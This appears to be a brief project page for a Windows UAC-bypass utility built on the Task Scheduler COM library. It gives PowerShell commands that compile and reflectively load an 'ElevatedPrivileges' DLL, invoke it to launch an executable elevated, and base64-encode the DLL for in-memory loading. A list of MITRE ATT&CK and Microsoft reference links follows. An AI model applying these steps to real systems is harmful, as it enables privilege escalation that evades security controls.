By add TaskScheduler COM Type Library through Add References dialog box, you can use any functions provided by operating system.
This part of functions highly inspired by How to bypass UAC in newer Windows versions.
Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\ElevatedPrivileges.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "ElevatedPrivileges.dll"
[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\ElevatedPrivileges.dll"))
If (([Management.Automation.PSTypeName]'ElevatedPrivileges').Type) { [ElevatedPrivileges]::Invoke("C:\ScheduledTask\ScheduledTask.exe") }
[Convert]::ToBase64String((Get-Content -Path .\ElevatedPrivileges.dll -Encoding Byte))
[Reflection.Assembly]::Load([Convert]::FromBase64String("")) | Out-Null
Markdown Cheatsheet · adam-p/markdown-here Wiki
Technique: CMSTP - MITRE ATT&CK™
Technique: Bypass User Account Control - MITRE ATT&CK™
WindowsPrincipal Class (System.Security.Principal) | Microsoft Docs
WindowsIdentity Class (System.Security.Principal) | Microsoft Docs
TaskFolder.RegisterTaskDefinition method - Windows applications | Microsoft Docs
Action object - Windows applications | Microsoft Docs
Stopwatch.StartNew Method (System.Diagnostics) | Microsoft Docs
Process.MainWindowHandle Property (System.Diagnostics) | Microsoft Docs
Windows Data Types - Windows applications | Microsoft Docs
Marshaling Data with Platform Invoke | Microsoft Docs
Marshaling Data with COM Interop | Microsoft Docs
How to: Simulate Mouse and Keyboard Events in Code | Microsoft Docs
FindWindowW function | Microsoft Docs
SetForegroundWindow function | Microsoft Docs
ShowWindow function | Microsoft Docs
SendMessage function | Microsoft Docs
WM_KEYDOWN message - Windows applications | Microsoft Docs
WM_KEYUP message - Windows applications | Microsoft Docs
Virtual-Key Codes - Windows applications | Microsoft Docs
Convert.ToBase64String Method (System) | Microsoft Docs
Convert.FromBase64String(String) Method (System) | Microsoft Docs
Get-Alias | Microsoft.PowerShell.Utility | Microsoft Docs
Get-Content | Microsoft.PowerShell.Management | Microsoft Docs